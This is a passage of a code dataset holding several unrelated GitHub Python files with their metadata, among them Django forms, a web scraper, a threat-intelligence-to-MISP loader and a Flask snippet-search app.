"sub_path": "examples/fiber_tm_exact.py", "file_name": "fiber_tm_exact.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fiber.fiber", "line_number": 17, "usage_type": "call"}, {"api_name": "stretchmesh.stretchmesh", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.optimize.fsolve", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ndenumerate", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "554706284", "text": "from setuptools import setup, find_packages\nimport os\n\nversion = '1.6.5.dev0'\n\ntests_require = [\n 'ftw.testbrowser',\n 'ftw.testing',\n 'plone.app.testing',\n]\n\nsetup(\n name='ftw.colorbox',\n version=version,\n description=\"An image gallery for Plone using ColorBox\",\n long_description='{0}\\n{1}'.format(\n open(\"README.rst\").read(),\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read()\n ),\n\n classifiers=[\n 'Framework :: Plone',\n 'Framework :: Plone :: 4.3',\n 'Framework :: Plone :: 5.1',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n\n keywords='ftw colorbox',\n author='4teamwork AG',\n author_email='mailto:info@4teamwork.ch',\n url='https://github.com/4teamwork/ftw.colorbox',\n license='GPL2',\n\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['ftw'],\n include_package_data=True,\n zip_safe=False,\n\n install_requires=[\n 'ftw.upgrade',\n 'setuptools',\n 'Plone',\n 'plone.api',\n ],\n\n tests_require=tests_require,\n 
extras_require=dict(tests=tests_require),\n\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n", "repo_name": "4teamwork/ftw.colorbox", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "10251211992", "text": "from multiprocessing import Process\n\nimport os\nimport time\n\n\ndef info(title):\n print(title)\n print('module name:', __name__)\n if hasattr(os, 'getppid'):\n print('parent process: {}'.format(os.getppid()))\n print('process id: {}'.format(os.getpid()))\n\n\ndef f(name):\n info('function f')\n time.sleep(2)\n print('hello {}'.format(name))\n\n\nif __name__ == '__main__':\n info('main line')\n p = Process(target=f, args=('bob',))\n p.start()\n p.join()\n", "repo_name": "perrydzhu/pydem0", "sub_path": "sock/multiproc.py", "file_name": "multiproc.py", "file_ext": "py", "file_size_in_byte": 477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getppid", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "15886466092", "text": "\"\"\"from turtle import Turtle, Screen\ntimmy = Turtle()\nprint(timmy)\ntimmy.shape(\"turtle\")\ntimmy.fd(100)\ntimmy.color(\"red\")\n\nmy_screen = Screen()\nprint(my_screen.canvheight)\n\nmy_screen.exitonclick()\"\"\"\n\nimport prettytable\n\nfrom prettytable import PrettyTable\ntable = PrettyTable()\nprint(table)\n#table.add_row([\"Name\",1,2])\ntable.add_column(\"age\",[11,22])\ntable.add_column(\"Name\",[11,22])\ntable.align =\"r\"\nprint(table)", "repo_name": "Harini0924/day-16-start", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "prettytable.PrettyTable", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "281305449", "text": "import os\nimport yaml\nimport numpy as np\nimport random\n\nCONFIG_PATH = 'config/'\n\ndef smooth_curve(x): #사용 x\n window_len = 101\n s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]\n w = np.kaiser(window_len, 2)\n y = np.convolve(w/w.sum(), s, mode='valid')\n return y[50:len(y)-50]\n\n\ndef shuffle_dataset(x, t): #사용 보류\n shuffled = list(zip(x, t))\n random.shuffle(shuffled)\n x = [e[0] for e in shuffled]\n t = [e[0] for e in shuffled]\n\n return x, t\n\ndef load_config(config_name):\n with open(os.path.join(CONFIG_PATH, config_name)) as file:\n config = yaml.safe_load(file)\n return config", "repo_name": "GwakJiho/DeepLearning", "sub_path": "cifar10/utils/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 640, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.r_", "line_number": 10, "usage_type": 
"attribute"}, {"api_name": "numpy.kaiser", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 12, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "74813081766", "text": "from django import forms\n\nfrom account.models import Student\nfrom .models import *\n\n\nclass JudgmentFactsForm(forms.ModelForm):\n\n class Meta:\n model = JudgmentFacts\n fields = ['name', 'team_length', 'fact_max_time', 'status']\n\n\nclass FactForm(forms.ModelForm):\n\n CORRECT_ANSWER = Choices(\n (True, 'Verdadeiro'),\n (False, 'Falso'),\n )\n correct_answer = forms.ChoiceField(choices=CORRECT_ANSWER, widget=forms.RadioSelect())\n\n class Meta:\n model = Fact\n fields = ['order', 'statement', 'topic_group', 'correct_answer']\n\n def save(self, commit=True, **kwargs):\n jf = JudgmentFacts.objects.get(id=kwargs['jf_id'])\n data = self.data\n return Fact.objects.create(\n order=data['order'], statement=data['statement'], topic_group=data['topic_group'],\n correct_answer=data['correct_answer'], judgment_facts=jf\n )\n\n\nclass TeamForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(TeamForm, self).__init__(*args, **kwargs)\n self.fields['member'].queryset = Student.objects.all().exclude(pk__in=Team.objects.all()).order_by('user__name')\n\n class Meta:\n model = Team\n fields = ['name', 'member']\n", "repo_name": "CarolClara/Julgamento-de-Fatos", "sub_path": "judgment_facts/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.RadioSelect", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 35, "usage_type": "name"}, {"api_name": "account.models.Student.objects.all", "line_number": 39, "usage_type": "call"}, {"api_name": "account.models.Student.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "account.models.Student", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "12126962479", "text": "import requests\nimport json\n\nlatitude = 0.0\nlongitude = 0.0\n\ndef get_Position():\n global latitude,longitude\n api_endpoint2 =\"http://api.open-notify.org/iss-now.json\"\n\n response = requests.get(api_endpoint2)\n print(response.status_code)\n status =response.raise_for_status()\n print(status)\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n print(\"success\")\n data = response.json()\n print(json.dumps(data, indent=4))\n position = data[\"iss_position\"]\n latitude = data[\"iss_position\"][\"latitude\"]\n longitude = data[\"iss_position\"][\"longitude\"]\n pos = 
(position,latitude,longitude)\n print(pos)\n else :\n print(\"something went wrong!\")\n \n\ndef get_SunriseSunset(lat ,long):\n api_endpoint2 =\"https://api.sunrise-sunset.org/json\"\n payload ={\n \"lat\" : lat ,\n \"lng\" : long\n }\n response = requests.get(api_endpoint2,params=payload)\n\n print(response.status_code)\n status =response.raise_for_status()\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n data = response.json()\n print(json.dumps(data, indent=4))\n print(data)\n sunrise = data[\"results\"][\"sunrise\"]\n sunset = data[\"results\"][\"sunset\"]\n print(\"sunrise time is : \" ,sunrise )\n print(\"sunset time is : \" ,sunset )\n else :\n print(\"something went wrong!\")\n\n\nget_Position()\nget_SunriseSunset(latitude,longitude)", "repo_name": "yogeshdhameliya6013/python", "sub_path": "api/sunrisesunset.py", "file_name": "sunrisesunset.py", "file_ext": "py", "file_size_in_byte": 1528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "42724496558", "text": "from django.contrib import admin\nfrom django.contrib.auth import login, logout\nfrom django.urls import include, path\n\n\nadmin.autodiscover()\n\nurlpatterns = (\n path(\"admin/\", admin.site.urls),\n path(\n \"registration/login/\",\n login,\n name=\"login\",\n ),\n path(\n \"registration/logout/\",\n logout,\n name=\"logout\",\n ),\n path(\"\", include(\"blog.urls\")),\n)\n", "repo_name": "lambdalisue/django-author", "sub_path": "tests/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 36, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "38512938406", "text": "#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport datetime\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nimport csv\nimport json\nimport codecs\nimport lxml\nfrom lxml import html\nimport yaml\n\n\ndef convert_to_datetime_date(date):\n \"\"\"Convert date to datetime.date\n\n Params:\n date (logring): \"Nov 15 '16\"\n Return:\n (datetime.date): datetime.date(2016,11,15)\n\n >>> convert_to_datetime_date(\"Nov 15 '16\")\n datetime.date(2016, 11, 15)\n \"\"\"\n date = date.split()\n month_name = ['January', 'February', 'March', 'April', 'May', 'June',\n 'July', 'Augulog', 'September', 'October', 'November', 'December']\n month_name = [x[:3] for x in month_name]\n month = month_name.index(date[0]) + 1\n date[2] = date[2].replace(\"'\", '20')\n return datetime.date(year=int(date[2]), month=month, day=int(date[1]))\n\n\ndef start_request(url):\n request = urllib.request.urlopen(url)\n # process handle exception\n response = request.read()\n return response\n\n\ndef log_data(app, version, date, change_log, database):\n if os.path.exists(database):\n mode = 'a'\n else:\n mode = 'w'\n if change_log == '':\n change_log = 'Rand'\n fields = ['iOS', date, '1', app, '1', '1',\n 'Version', 'Rand', version, change_log]\n fields_name = ['Platform', 'Date', 'App ID', 'App Name', 'Publisher ID',\n 'Publisher Name', 'Update Type', 'Previous Value', 'New Value', 'Notes']\n\n stream = open(database, mode)\n writer = csv.writer(stream)\n if mode == 'w':\n writer.writerow(fields_name)\n writer.writerow(fields)\n\n\ndef format_change_log(log):\n \"\"\"Reformat application news log to desired form.\n\n \"\"\"\n # print(log)\n detele_char = [\"u'\", 'u\"', \"'\", '\"', \"
",", "", "", '-', '[', ']', "
\"]\n for char in detele_char:\n log = log.replace(char, \"\")\n\n f = codecs.open(\"temp.txt\", \"w\", \"utf-8\")\n f.write(log)\n f.close()\n\n f = open(\"temp.txt\", \"r\")\n log = \"\"\n for line in f:\n log = log + line\n\n f.close()\n\n #log = log.replace(\"\\n\", \" \")\n unicode_logr = {\n \"\\xc2\\xb7\": \"\\n-\",\n \"\\xe2\\x80\\xa2\": \"\\n-\",\n \"\\xe2\\x80\\x94\": \"\\n-\",\n '\\xc3\\xa2\\xc2\\x80\\xc2\\xa2': \"-\",\n '\\xc3\\xb0\\xc2\\x9f\\xc2\\x91\\xc2\\xbb': '',\n '\\xc3\\x82\\xc2\\xa0': ' ',\n '\\xc3\\xa2\\xc2\\x80\\xc2\\x94': ' '\n }\n\n # print log\n\n for key in list(unicode_logr.keys()):\n log = log.replace(key, unicode_logr[key])\n\n return log\n\n\ndef process_response(resp, start_date, database):\n \"\"\"\n Get all the app update activity from start_date.\n \"\"\"\n\n tree = lxml.html.fromstring(resp)\n app_name = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[1]/div/h1/text()')[0]\n change_log = \"\"\n for st in tree.xpath('//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[2]/p[2]/text()'):\n change_log = change_log + st\n change_log = format_change_log(change_log)\n\n version_set = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[2]/div[2]/div/ul/li')\n for element in version_set:\n version = element.xpath('b/text()')[0]\n version = version.split()[1]\n date = element.xpath(\"span/text()\")[0]\n date = convert_to_datetime_date(date)\n if date >= start_date:\n log_data(app_name, version, date, change_log, database)\n\n # reset changelog\n change_log = \"\"\n\n\ndef get_params(index_file):\n \"\"\"\n Params:\n index_file (string): index file name.\n\n Returns:\n (dictionary): parameters and values.\n\n >>> params = get_params(\"index.yaml\")\n >>> params['country']\n 'VN'\n >>> params['list_name']\n 'topselling_free'\n >>> params['cat_key']\n 'APPLICATION'\n \"\"\"\n stream = open(index_file, \"r\")\n params = yaml.load(stream)\n stream.close()\n\n return params\n\n\ndef scan_for_change(index_file):\n\n params = get_params(index_file)['change_logs']\n\n database = params['database_name']\n\n today = datetime.date.today()\n\n start_date = today - datetime.timedelta(params['range_of_query'])\n\n for app_info in list(params['apps_src_dest'].keys()):\n print(\"Running: \" + app_info + \"\\n\")\n url = params['apps_src_dest'][app_info][0]\n database = params['dir'] + params['apps_src_dest'][app_info][1]\n resp = start_request(url)\n process_response(resp, start_date, database)\n\n\nprint(\"Program {} start!\".format(__file__))\nscan_for_change('index_ios.yaml')\nprint(\"Program {} finish sucessfully.\".format(__file__))\n\n# if __name__ == \"__main__\":\n# import doctest\n# doctest.testmod()\n", "repo_name": "zenzjtech/Mobile-app-timeline", "sub_path": "change-logs_ios.py", "file_name": "change-logs_ios.py", "file_ext": "py", "file_size_in_byte": 4662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 37, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 56, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 72, 
"usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 107, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 107, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 158, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 160, "usage_type": "call"}]} +{"seq_id": "23840309202", "text": "import requests\nfrom requests import HTTPError, ConnectionError, ConnectTimeout\nfrom model import Config\nfrom model.events import C2Server, Malware, Actor, Family\nfrom datetime import datetime, timedelta\nimport logging\nimport sys\n\n\nclass Loader:\n\n @staticmethod\n def start(conf, tags, type, startdate, file, noupload, searchfile, proxy_misp_addr, proxy_tie_addr):\n\n # Building Auth Header\n conf_authHeader = {'Authorization': 'Bearer ' + conf.tie_api_key}\n\n # Building URL\n date_since = startdate.strftime(\"%Y-%m-%d\")\n dt = startdate + timedelta(days=1)\n date_until = dt.strftime(\"%Y-%m-%d\")\n category = None\n finished = True\n event = None\n connection_error = False\n\n # Eventtype\n if type == 'c2server':\n event = C2Server(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_c2server, startdate)\n category = 'c2-server'\n elif type == 'malware':\n event = Malware(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_malware, startdate)\n category = 'malware'\n\n elif type == 'actor':\n event = Actor(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_actor, startdate)\n category = 'actor'\n\n elif type == 'family':\n event = Family(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_family, startdate)\n category = 'family'\n\n # Buildung parameters\n payload = dict()\n if category == 'c2-server' or category == 'malware':\n payload['category'] = category\n payload['created_since'] = date_since\n payload['created_until'] = date_until\n\n else:\n attr_list = ''\n count = 0\n for l in searchfile:\n if count is 0:\n attr_list += l\n else:\n attr_list += ',' + l\n count += 1\n attr_list = attr_list.replace('\\n', '')\n if category is 'actor':\n payload['actor'] = attr_list\n else:\n payload['family'] = attr_list\n\n url = conf.tie_api_url + conf.url_iocs\n index = 0\n connection_retrys = 1\n while finished:\n try:\n myResponse = requests.get(url, params=payload, headers=conf_authHeader, proxies=proxy_tie_addr)\n # For successful API call, response code will be 200 (OK)\n if myResponse.ok:\n # print(myResponse.status_code)\n # Loading the response data into a dict variable\n # json.loads takes in only binary or string variables so using content to fetch binary content\n # Loads (Load String) takes a Json file and converts into python data structure\n # (dict or list, depending on JSON)\n\n try:\n jsonResponse = myResponse.json()\n\n # check is TIE Response is complete\n response_has_more = None\n response_iocs = None\n response_params = None\n if 'has_more' in jsonResponse and 'iocs' in jsonResponse and 'params' in jsonResponse:\n response_has_more = jsonResponse['has_more']\n response_iocs = jsonResponse['iocs']\n response_params = jsonResponse['params']\n else:\n raise ValueError(\"Error: TIE answered with an invalid or empty JSON Response\")\n\n # parsing received IOC's\n 
logging.info(\"Parsing... - Offset: \" + str(index) + \" to \" + str(index + len(response_iocs)))\n index += len(response_iocs)\n\n if type == 'c2server':\n C2Server.parse(event, response_iocs, tags)\n elif type == 'malware':\n Malware.parse(event, response_iocs, tags)\n elif type == 'actor':\n Actor.parse(event, response_iocs, tags)\n elif type == 'family':\n Family.parse(event, response_iocs, tags)\n\n if response_has_more is not True:\n finished = False\n logging.info(\"There are no more attributes\")\n logging.info(\"#### Finished #####\")\n break\n else:\n if isinstance(myResponse.links, dict):\n res = myResponse.links[\"next\"]\n url = res[\"url\"]\n logging.info(\"#### Continue #####\")\n\n except ValueError:\n logging.error(\"Error: Invalid or empty JSON Response\")\n elif myResponse.status_code >= 500 and myResponse.status_code <= 550:\n logging.warning(\"It seems there are connection issues with TIE at the moment\")\n logging.warning(\"Status-Code: \" + str(myResponse.status_code) + \" - Try: \" + connection_retrys + \" from 5\")\n\n connection_retrys += 1\n if connection_retrys < 6:\n continue\n else:\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n raise ConnectionError\n\n else:\n # If response code is not ok (200), print the resulting http error code with description\n logging.error(\"Error:\")\n logging.error(myResponse.content)\n myResponse.raise_for_status()\n except (HTTPError, ConnectionError, ConnectTimeout) as e:\n logging.error(\"Error:\")\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n connection_error = True\n finished = False\n\n # TIE is available?\n if not noupload and not connection_error and conf.misp_api_key is not None and conf.misp_api_url is not None:\n # Add Base Tags\n if isinstance(event, C2Server):\n if tags.c2tags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n elif isinstance(event, Malware):\n if tags.malwaretags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n\n # Load things up\n try:\n event.upload(conf, proxy_misp_addr)\n except Exception as e:\n logging.error(\"Error uploading event to MISP. Something went wrong...\\n\")\n\n else:\n if not noupload and not connection_error:\n logging.warning(\"Can not upload event. 
MISP API key or MISP API URL is missing\")\n\n if file:\n # Serialize event as MISP Event\n json_output = event.serialize()\n outfile = type + \"_\" + str(event.uuid) + \".json\"\n logging.info(\"Saved attributes as JSON-File: \" + outfile)\n with open(outfile, \"w\") as text_file:\n text_file.write(json_output)\n\n @staticmethod\n def init_logger(logPath, fileName, logLvl, consoleLog, fileLog):\n\n logger = logging.getLogger()\n logger.setLevel(logLvl)\n formatter = logging.Formatter('%(asctime)s [%(levelname)-5.5s] %(message)s')\n\n consoleHandler = logging.StreamHandler(sys.stdout)\n\n consoleHandler.setFormatter(formatter)\n logger.addHandler(consoleHandler)\n\n if consoleLog is False:\n consoleHandler.setLevel(logLvl)\n else:\n consoleHandler.setLevel(100)\n\n if fileLog is False:\n fileHandler = logging.FileHandler(\"{0}/{1}.log\".format(logPath, fileName))\n fileHandler.setFormatter(formatter)\n fileHandler.setLevel(logLvl)\n logger.addHandler(fileHandler)\n\n", "repo_name": "DCSO/tie2misp", "sub_path": "loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 8553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.timedelta", "line_number": 20, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 29, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 33, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 38, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "model.events.C2Server.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 102, "usage_type": "name"}, {"api_name": "model.events.Malware.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 104, "usage_type": "name"}, {"api_name": "model.events.Actor.parse", "line_number": 106, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 106, "usage_type": "name"}, {"api_name": "model.events.Family.parse", "line_number": 108, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 131, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 132, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 136, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 137, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectionError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectTimeout", "line_number": 139, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 141, "usage_type": "call"}, 
{"api_name": "model.events.C2Server", "line_number": 148, "usage_type": "argument"}, {"api_name": "model.events.Malware", "line_number": 152, "usage_type": "argument"}, {"api_name": "logging.error", "line_number": 161, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 165, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 178, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 182, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "74741752489", "text": "import os\nfrom flask import Flask, jsonify, request, send_from_directory, render_template\nfrom models_wrapper import CodeSnippet\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\nfrom flask_cors import CORS\nfrom sqlalchemy import or_\n\n# Initialize Flask app\napp = Flask(__name__)\n\n# Add CORS middleware to allow cross-origin requests\ncors = CORS(app)\n\n# Database configurations\nDB_NAME = \"mydatabase\"\nDB_USER = \"your_new_user\"\nDB_PASSWORD = \"qwerty\"\nDB_HOST = \"localhost\"\nDB_PORT = \"5432\"\n\n# Create a database engine and a session factory\nengine = create_engine(f\"postgresql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}\")\nSession = sessionmaker(bind=engine)\n\n# API endpoint to add a new code snippet\n@app.route('/add_snippet', methods=['POST'])\ndef add_snippet():\n # Get the data from the request\n snippet_data = request.json\n\n # Create a session and add a new code snippet to the database\n session = Session()\n new_snippet = CodeSnippet(\n name=snippet_data['name'],\n description=snippet_data['description'],\n file_path=snippet_data['file_path'],\n code=snippet_data['code']\n )\n session.add(new_snippet)\n session.commit()\n\n # Return a success message\n return jsonify({'message': 'Code snippet added successfully.'})\n\n# API endpoint to search code snippets\n@app.route('/search', methods=['POST'])\ndef search_code_snippets():\n # Get search criteria from the request\n search_data = request.json\n\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Apply search filters\n query = query.filter(\n or_(\n CodeSnippet.name.contains(search_data['name']),\n CodeSnippet.description.contains(search_data['description']),\n CodeSnippet.code.contains(search_data['code'])\n )\n )\n\n # Fetch results and convert them to a list of dictionaries\n results = query.all()\n response_data = [{'id': result.id, 'name': result.name, 'description': result.description, 'file_path': result.file_path, 'code': result.code, 'latest_commit': result.latest_commit} for result in results]\n\n # Debugging\n print('Search data:', search_data)\n print('Query:', query)\n print('Results:', results)\n print('Response data:', response_data)\n\n # Print executed SQL\n print(\"Executed SQL:\", query.statement.compile(compile_kwargs={\"literal_binds\": True}))\n\n # Return JSON response\n return jsonify(response_data)\n\n@app.route('/generate', methods=['POST'])\ndef generate():\n data = request.get_json()\n input_text = data.get('input')\n code_snippet = CodeSnippet(input_text)\n code = code_snippet.generate_code()\n return jsonify({\"code\": code})\n\n@app.route('/index1.html')\ndef index1():\n 
